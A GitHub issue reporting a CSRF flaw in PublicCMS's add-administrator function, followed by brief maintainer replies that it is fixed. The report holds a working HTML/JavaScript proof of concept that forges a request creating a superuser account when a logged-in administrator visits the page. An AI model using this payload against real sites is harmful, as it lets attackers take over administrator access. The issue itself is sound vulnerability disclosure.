New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a CSRF vulnerability that can add the administrator account #11

Closed
jearyorg opened this Issue May 25, 2018 · 4 comments

Comments

3 participants
@jearyorg

jearyorg commented May 25, 2018

The Add administrator Function is not check referer and token

POC:

<html>
  <!-- CSRF PoC  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/127.0.0.1:8080\/publiccms\/admin\/sysUser\/save.do?callbackType=closeCurrent&navTabId=sysUser\/list", true);
        xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9,en;q=0.8");
        xhr.withCredentials = true;
        var body = "id=&name=testvul&superuserAccess=on&deptId=1&deptName=%E6%8A%80%E6%9C%AF%E9%83%A8&password=123456&repassword=123456&nickName=testvul&email=test%40gmail.com&roleIds=1";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Building a page and inducing administrator access can add a user with super privileges.

@sanluan

This comment has been minimized.

Owner

sanluan commented May 26, 2018

fixed in develop branch

@attritionorg

This comment has been minimized.

attritionorg commented May 26, 2018

@sanluan Can you link to the fixing commit please?

@sanluan

This comment has been minimized.

Owner

sanluan commented May 28, 2018

@attritionorg

This comment has been minimized.

attritionorg commented May 28, 2018

@sanluan Thank you!

@sanluan sanluan closed this May 29, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment